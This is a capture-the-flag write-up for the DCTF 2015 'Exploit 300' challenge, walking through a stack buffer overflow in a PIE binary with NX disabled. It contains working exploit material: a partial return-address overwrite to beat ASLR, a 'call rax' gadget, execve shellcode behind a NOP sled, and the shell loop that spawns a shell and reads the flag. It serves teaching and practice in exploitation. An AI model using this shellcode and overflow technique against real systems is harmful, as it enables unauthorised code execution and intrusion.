DCTFU CTF 2015 prequals Exploit 300

@mrexcessive WHA


Keyhole Surgery

 

The problem

Such exploit, much random (Exploit 300)
Just do the obvious, get the flag!
Target: dctfu_*@10.13.37.11:22
Password: see dashboard.
Flag: cat /flag

Pwnable Exploit no-source binary-provided

 

The solution

So we need a shell. We are running the program in a remote ssh session over the challenge VPN.

The first step is to pull down the binary: hex-dump it with xxd on the remote side, then rebuild it locally with xxd -r.
I've put a copy of the xxd file here https://gist.github.com/mrexcessive/66b4ae7f399bb1ab3cbe

The second step is to run readelf -a and objdump -d on the binary.

The program reports that it is expecting input in a fixed format

$ ./e300
./e300 <num> <string>

Of course I try to break the string part...

./e300 $(python -c 'print "2 " + "3" * 4000')
Segmentation fault (core dumped)

This only happens sometimes though... It seems that the first argument has to match a random value. A quick look at the code shows us this:

 a3d:    48 8d 45 f0             lea    -0x10(%rbp),%rax
 a41:    48 89 c7                mov    %rax,%rdi
 a44:    b8 00 00 00 00          mov    $0x0,%eax
 a49:    e8 22 fe ff ff          callq  870 
 a4e:    89 c7                   mov    %eax,%edi
 a50:    e8 eb fd ff ff          callq  840      # srand(time()) - so gets same rand() for a second...
 a55:    e8 56 fe ff ff          callq  8b0 
 a5a:    89 c1                   mov    %eax,%ecx

So we generally have to keep running the attacks until the random number selected based on time() lines up with our "2"
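A minimal sketch of why the value repeats within a second, assuming a POSIX system where Python can reach the C library's srand() and rand() through ctypes. The helper names and the modulus parameter are hypothetical: the excerpt above only shows time(), srand() and rand(), not how the result is reduced to the number compared against the first argument. Any prediction would also only match the target if both machines use the same libc.

```python
import ctypes
import time

# Assumption: POSIX system; CDLL(None) exposes the C library's symbols.
libc = ctypes.CDLL(None)
libc.srand.argtypes = [ctypes.c_uint]
libc.srand.restype = None
libc.rand.restype = ctypes.c_int


def first_rand(seed):
    """Return the first rand() value produced after srand(seed)."""
    libc.srand(seed & 0xFFFFFFFF)
    return libc.rand()


def guess_first_arg(seed, modulus):
    """Hypothetical reduction of rand() to the expected first argument."""
    return first_rand(seed) % modulus


if __name__ == "__main__":
    now = int(time.time())
    # Same second means same seed, which means the same first rand() value.
    print(now, first_rand(now), first_rand(now))
```

Calling first_rand() twice with the same seed returns the same number, which is why every run started within one second expects the same first argument.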

Further experiments find that the segfault still happens with *400 chars

./e300 $(python -c 'print "2 " + "3" * 400')
Segmentation fault (core dumped)

Grabbing the checksec.sh script and running it locally tells us that the binary is position independent (PIE enabled, so it gets relocated on every run) and that NX is disabled.

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   PIE enabled     No RPATH   No RUNPATH   e300

So can I run gdb on the remote host?
Yes.

OK. Sending the *400 input chars through gdb gives these registers:

(gdb) info regi
rax            0x7ffc28859fd0    140720988331984
rbx            0x0    0
rcx            0x7ffc2885a140    140720988332352
rdx            0x7ffc2885a140    140720988332352
rsi            0x7ffc2885bd08    140720988339464
rdi            0x7ffc28859fd0    140720988331984
rbp            0x3333333333333333    0x3333333333333333
rsp            0x7ffc2885a108    0x7ffc2885a108
/snip/
rip            0x7efffa718a2d    0x7efffa718a2d

So we got control over $rbp but nothing else yet.

Perhaps I should be sending less not more.

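Some more experimentation and I realise that only the lowest 8 bits of RIP can be safely overwritten! That is because of PIE and ASLR (not RELRO): the load address changes on every run, so only the low-order part of the saved return address is predictable.
The program is always loaded on a 256 byte boundary - so we can modify the valid $rip value to anything in the ????aDD range.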

We only get to control DD - or things just break.

The way to do this is to send in 312 bytes of padding then the LSB to land in $rip

./e300 $(python -c 'print "2 " + "3"*312 + "\xd6"')
333333333333333333333333333333/snip/33� <number> <something>
Bus error (core dumped)
dctfu_575@e300:~$ ./e300 $(python -c 'print "2 " + "3"*312 + "\xb9"')
Should have been: 365383047
Bus error (core dumped)
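A small sketch of what the partial overwrite does to the saved return address. Addresses are stored little-endian, so the first byte past the 312 bytes of padding lands on the lowest byte. The function name and the example address are illustrative only; the real address differs on every run.

```python
def overwrite_low_bytes(address, new_bytes, width=8):
    """Simulate an overflow that replaces only the lowest bytes of a
    little-endian stored address and leaves the upper bytes untouched."""
    raw = bytearray(address.to_bytes(width, "little"))
    raw[:len(new_bytes)] = new_bytes
    return int.from_bytes(raw, "little")


if __name__ == "__main__":
    saved_rip = 0x7F1CF6E5FAC5  # example value only, changes with ASLR
    for low in (0xD6, 0xB9):
        # Only the last two hex digits of the address change.
        print(hex(overwrite_low_bytes(saved_rip, bytes([low]))))
```

With a single byte the upper part of the address is never touched, so the jump always stays inside the same 256 byte window regardless of where the program was loaded.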

So now I'm about 3 hours in... going slow, I know... and think maybe there is a ROP gadget... We have tested that we can get to anywhere in the aDD range of code.


Aside - the ROPgadget tool is great... install it now and play with it, https://github.com/JonathanSalwan/ROPgadget

Then I suggest you try the picoctf Hardcore ROP challenge...


I've put the objdump output - marked up with my comments - on gist for reference, https://gist.github.com/mrexcessive/85d75b8725d07c0afbaa

You can see where I've marked the 'aDD' section of the code as the 'EASILY CALLED BLOCK', because we can definitely cause execution to jump to any of these locations.

However... the subset of ROPgadgets available in this range is poor:

If we restrict to just the ones between a00 and aff
0x0000000000000aeb : add bl, ch ; add eax, 0xb8 ; add cl, cl ; ret
0x0000000000000aef : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x0000000000000af0 : add byte ptr [rax], al ; add cl, cl ; ret
0x0000000000000af1 : add byte ptr [rax], al ; leave ; ret
0x0000000000000af2 : add cl, cl ; ret
0x0000000000000aed : add eax, 0xb8 ; add cl, cl ; ret
0x0000000000000a0f : dec dword ptr [rax - 0x77] ; ret 0x8b48
0x0000000000000a2b : dec ecx ; ret
0x0000000000000a2c : leave ; ret
0x0000000000000aee : mov eax, 0 ; leave ; ret
0x0000000000000a12 : ret 0x8b48
0x0000000000000a6d : ret 0xd089

That is not a lot !
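A rough sketch of how the listing above can be produced from a full gadget dump, assuming the "ADDRESS : instructions" text format shown in the list. The function name is hypothetical and this is a plain text filter, not part of ROPgadget itself.

```python
def gadgets_in_range(lines, low, high):
    """Parse 'ADDRESS : instructions' lines and keep the gadgets whose
    address falls inside [low, high]."""
    kept = []
    for line in lines:
        addr_text, sep, instructions = line.partition(" : ")
        if not sep:
            continue  # header or blank line, not a gadget
        try:
            address = int(addr_text.strip(), 16)
        except ValueError:
            continue  # left-hand side was not a hex address
        if low <= address <= high:
            kept.append((address, instructions.strip()))
    return kept


if __name__ == "__main__":
    sample = [
        "0x00000000000009c1 : call rax",
        "0x0000000000000a2b : dec ecx ; ret",
        "0x0000000000000a2c : leave ; ret",
    ]
    for address, text in gadgets_in_range(sample, 0xA00, 0xAFF):
        print(hex(address), text)
```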
Wasting time

The trouble with ASLR is that the program is one-shot. It runs, it stops. When you run it again everything has moved.

So, I spent a stupid amount of time trying to find a way to determine the addresses for stack or code segments. Often ASLR challenges have a way to exfiltrate a clue to valid code, stack, malloc or libc address spaces.

This one does not... (AFAIK)


If we knew where the stack would be then we could put a NOPsled and shellcode in all those 312 '3' characters and jump to it.

Similarly if we knew where the code segment was then we wouldn't be restricted to just overwriting the LSB of RIP, and could jump to any ROP gadget in the program...

... and if we knew where libc was being loaded (that also moves around) then we could do a libc system() call.


I learned quite a lot about this program.. and explored all the wrong avenues before the right ones.


One thing I noticed is that the random number (range 0..5) which you have to match with the first parameter value in argv[] is strongly dependent on a call to time() followed by a call to srand().  Well, I noticed that earlier, but didn't think to exploit it straight away.  If you run the program 6 times quickly, with all six possible first values, then you nearly always get a proper run - i.e. one which triggers the memcpy().

At a particularly tired - and not thinking clearly - stage, I built a shell script to run the program multiple times for all possible values of the RIP LSB, 256 times for each one... and 6 times for each of those - to hit the correct time() based rand() value.

for i in 214; do echo "$i  ";
  for j in $(seq 0 255); do      # chr() only accepts 0..255
    for k in $(seq 0 5); do      # try every possible first argument
      ./e300 $(python -c 'print "'$k' " + "%x"*156 + chr('$i') + chr('$j')');
    done;
  done;
done

However all this revealed was that things were not going to be that simple. There's nothing there to just give us a shell ...

While the big loop was running, I was reading some more background materials on ASLR.
from http://security.stackexchange.com/questions/18556/how-do-aslr-and-dep-work and
http://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx

We have to fight for shell !!!

I wonder if LD_PRELOAD can be used to get control... Sadly it only works when I'm running inside gdb.

So now I decide to STOP WORRYING about whether there will be a way to get control into shellcode passed in the argv[2] param. I decide it will be possible and that my brain just needs some relaxing time, away from staring at the difficult part. So I spend about an hour getting some shellcode to run, using gdb to force RIP to my shellcode at the point where I think the exploit will eventually need to do this (the LEAVE / RET at the end of the strlen()/memcpy() code):

 a01:    48 8b 85 c8 fe ff ff    mov    -0x138(%rbp),%rax
 a08:    48 89 c7                mov    %rax,%rdi
 a0b:    e8 00 fe ff ff          callq  810 <strlen@plt>          # call strlen on it
 a10:    48 89 c2                mov    %rax,%rdx
 a13:    48 8b 8d c8 fe ff ff    mov    -0x138(%rbp),%rcx
 a1a:    48 8d 85 d0 fe ff ff    lea    -0x130(%rbp),%rax
 a21:    48 89 ce                mov    %rcx,%rsi                 # memcpy with strlen bytes (rdx)
 a24:    48 89 c7                mov    %rax,%rdi                 # onto stack - but where is stack !
 a27:    e8 34 fe ff ff          callq  860 <memcpy@plt>
 a2c:    c9                      leaveq 
 a2d:    c3                      retq                 <-- This is the RET (retq = QWORD return address - 64bit model) to shell

Once the shell is running, with the manual start in gdb, then I've got more confidence.
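The disassembly above also accounts for the 312 bytes of padding. A short worked calculation, assuming the usual x86-64 frame layout (saved rbp at rbp, return address at rbp+8); the constant and function names are only for illustration.

```python
# memcpy destination, from: lea -0x130(%rbp),%rax
BUFFER_OFFSET_FROM_RBP = 0x130
# leaveq restores the saved rbp (8 bytes on x86-64) before retq runs
SAVED_RBP_SIZE = 8


def bytes_before_return_address(buffer_offset=BUFFER_OFFSET_FROM_RBP,
                                saved_rbp=SAVED_RBP_SIZE):
    """Number of bytes copied before the first byte of the saved return
    address is reached."""
    return buffer_offset + saved_rbp


if __name__ == "__main__":
    total = bytes_before_return_address()
    print(total, hex(total))
```

The last 8 of those bytes land on the saved rbp, which is why rbp shows up as 0x3333333333333333 in the first register dump.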

I start to wonder if perhaps I can just overwrite the two least significant bytes of RIP... which would let me call any ROP gadget in the program.
Of course it would only work when the second byte was correct... but there are only 256 possible values - and one of the ASLR articles has suggested this as an approach to use.

I mess with the program some more... Oh it might be even easier... the third nibble is always 0xa when running in the "EASILY CALLED BLOCK" - which means it would always be 0x9 for the previous block... for example.

So there should only be 16 possible ASLR slots for any particular block.
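The arithmetic behind the 16 slots, as a sketch. It assumes the load address is aligned to 4 KiB pages (consistent with the third nibble never changing), so the low 12 bits of any code address are fixed and a two-byte overwrite only has to guess the remaining 4 bits. Function names are hypothetical.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages, load address page-aligned


def random_bits_in_overwrite(num_bytes, page_size=PAGE_SIZE):
    """Bits of an overwrite of num_bytes low bytes that ASLR randomises."""
    fixed_bits = page_size.bit_length() - 1  # 12 for 4 KiB pages
    return max(0, num_bytes * 8 - fixed_bits)


def chance_within(attempts, slots):
    """Probability of at least one hit in `attempts` independent tries."""
    return 1 - (1 - 1 / slots) ** attempts


if __name__ == "__main__":
    slots = 2 ** random_bits_in_overwrite(2)
    print("slots:", slots)
    for n in (1, 16, 50, 100):
        print(n, round(chance_within(n, slots), 3))
```

A one-byte overwrite has no random bits at all, which matches the earlier observation that the LSB can always be set safely.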

I review the ROP gadgets available, see https://gist.github.com/mrexcessive/11ecc80397a7bd46ad5a

In block 0x9.. there is a potentially very useful ROP gadget:
0x00000000000009c1 : call rax

Do we have control of rax ?

; this is at the point of execution of the 0xa2d retq
rax            0x7ffd06400de0    140724708314592
rbx            0x0    0
rcx            0x7ffd06400f00    140724708314880
rdx            0x7ffd06400f00    140724708314880
rsi            0x7ffd06402d50    140724708322640
rdi            0x7ffd06400de0    140724708314592
rbp            0x7ffd06400f10    0x7ffd06400f10
rsp            0x7ffd06400dd0    0x7ffd06400dd0
r8             0x1f70    8048
r9             0x1f60    8032
r10            0x1f50    8016
r11            0x7f1cf690cfd0    139762372497360
r12            0x7f1cf6e5f8c0    139762378078400
r13            0x7ffd06401020    140724708315168
r14            0x0    0
r15            0x0    0
rip            0x7f1cf6e5fa2c    0x7f1cf6e5fa2c


(gdb) x/200xw $rsp
0x7ffd06400dd0:    0x7c943c72  0x00000000  0x06402d30  0x00007ffd
0x7ffd06400de0:  [0x90909090] 0x90909090    0x90909090  0x90909090  rdi and rax pointing [here]
0x7ffd06400df0:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e00:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e10:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e20:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e30:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e40:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e50:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e60:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e70:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e80:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400e90:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400ea0:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400eb0:    0x90909090  0x90909090  0x90909090  0x90909090
0x7ffd06400ec0:    0x90909090  0x90909090  0x31909090  0xd1bb48c0
0x7ffd06400ed0:    0xd091969d  0x48ff978c  0x5453dbf7  0x5752995f
0x7ffd06400ee0:    0x3bb05e54  0x4141050f  0x41414141  0x41414141
0x7ffd06400ef0:    0x41414141  0x41414141  0x41414141  0x41414141
0x7ffd06400f00:  >0x41414141<    0x41414141  0x41414141  0x41414141  rcx and rdx are pointing >here<
0x7ffd06400f10:    0x41414141  0x64636261  0xf6e5*fac5*    0x00007f1c  *fac5* these are the two least significant bytes of RIP that we can overwrite by overflowing the buffer...
0x7ffd06400f20:    0x06401028  0x00007ffd  0xf6e5f8c0  0x00000003

Notice the shellcode has a NOPsled in front...

But REALLY notice that rax is pointing to the start of the NOPsled - which is the location where the memcpy() has just put our argv[2] parameter.
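As a sanity check on the shellcode bytes visible in the dump (the 32-bit words are little-endian, so 0x31909090 0xd1bb48c0 reads as 90 90 90 31 c0 48 bb d1 ...), here is a small sketch that decodes the 8-byte immediate loaded into rbx. The shellcode negates that value before pushing it, which keeps NUL bytes out of the payload. The function name is only for illustration.

```python
SHELLCODE = bytes.fromhex(
    "31 c0 48 bb d1 9d 96 91 d0 8c 97 ff 48 f7 db "
    "53 54 5f 99 52 57 54 5e b0 3b 0f 05"
)


def hidden_string(shellcode):
    """Undo the 'mov rbx, imm64 ; neg rbx' trick and return the 8 bytes
    that end up being pushed on the stack."""
    # Bytes 2..3 are the opcode of mov rbx, imm64; the immediate follows.
    if shellcode[2:4] != b"\x48\xbb":
        raise ValueError("unexpected shellcode layout")
    immediate = int.from_bytes(shellcode[4:12], "little")
    negated = (-immediate) & 0xFFFFFFFFFFFFFFFF  # 64-bit two's complement
    return negated.to_bytes(8, "little")


if __name__ == "__main__":
    print(len(SHELLCODE), hidden_string(SHELLCODE))
```

The final bytes b0 3b 0f 05 set al to 0x3b (59, the execve syscall number on x86-64 Linux) and issue the syscall.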

So... if we send in 0xZ9c1 as the two bytes for the RIP overwrite - then SOMETIMES (one in 16 times, by chance) the ASLR will position things so that the call rax gadget is executed.
And we should get a shell!

My first couple of attempts failed, due to over-excited typos...
Then I hit a snag... but had such energy at this point... that I realised it was because 0x09 was a REALLY BAD value to use for Z9

Because it is a TAB character... and splits up the argv[2] value...
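A quick sketch of which Z9 values survive the trip through the shell. It assumes the payload is passed via an unquoted $(...) as in the commands here, so the default IFS characters (space, tab, newline) split the argument, and that a NUL byte cannot appear inside an argv string. Names are hypothetical.

```python
SHELL_SPLIT_BYTES = {0x09, 0x0A, 0x20}  # default IFS: tab, newline, space
NUL = 0x00                              # would terminate the argv string


def usable_second_bytes(low_nibble=0x9):
    """All Z9-style bytes (high nibble free, low nibble fixed) that can be
    passed safely inside an unquoted command substitution."""
    candidates = [(z << 4) | low_nibble for z in range(16)]
    return [b for b in candidates
            if b not in SHELL_SPLIT_BYTES and b != NUL]


if __name__ == "__main__":
    print([hex(b) for b in usable_second_bytes()])
```

Of the sixteen candidates only 0x09 is rejected; any of the others can be tried.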

So... correcting that I now have:

for i in $(seq 0 100);
do ./e300 $(python -c 'print "2 " + "\x90"*235 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "A" * 46 + "abcd" + chr(0xc1) + chr(0xe9)');
done; echo "FINISHED"
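The layout of that argv[2] value, rebuilt as a sketch in Python 3 bytes so the lengths can be checked. The constant and function names are mine; the byte values are the ones from the command above.

```python
import struct

NOP_SLED = b"\x90" * 235
SHELLCODE = bytes.fromhex(
    "31 c0 48 bb d1 9d 96 91 d0 8c 97 ff 48 f7 db "
    "53 54 5f 99 52 57 54 5e b0 3b 0f 05"
)
FILLER = b"A" * 46 + b"abcd"  # pads out to the saved return address
TARGET_LOW16 = 0xE9C1         # hoped-for low 16 bits of the call rax gadget


def build_payload():
    """NOP sled + shellcode + filler, then the two low bytes of RIP in
    little-endian order (0xc1 first, then 0xe9)."""
    return NOP_SLED + SHELLCODE + FILLER + struct.pack("<H", TARGET_LOW16)


if __name__ == "__main__":
    payload = build_payload()
    print(len(payload), payload[-2:].hex())
```

Everything before the last two bytes adds up to 312, so the c1 and e9 bytes land exactly on the two lowest bytes of the saved return address.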

And run it... getting lucky on the 4th iteration...

Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
$ ls -la
total 256
drwx------    3 dctfu_574 dctf       4096 Oct  3 18:07 .
d-wx--x--x 8130 root      root     241664 Oct  2 03:04 ..
drwx------    2 dctfu_574 dctf       4096 Oct  3 18:07 .cache
-rwxr-sr-x    1 root      solution   6352 Oct  2 19:52 e300
$ cat /flag
DCTF{2621204f73c01a1cbc995b24a57106ad}$ 

Score flag and Great Big Happy !!

! DCTF{2621204f73c01a1cbc995b24a57106ad}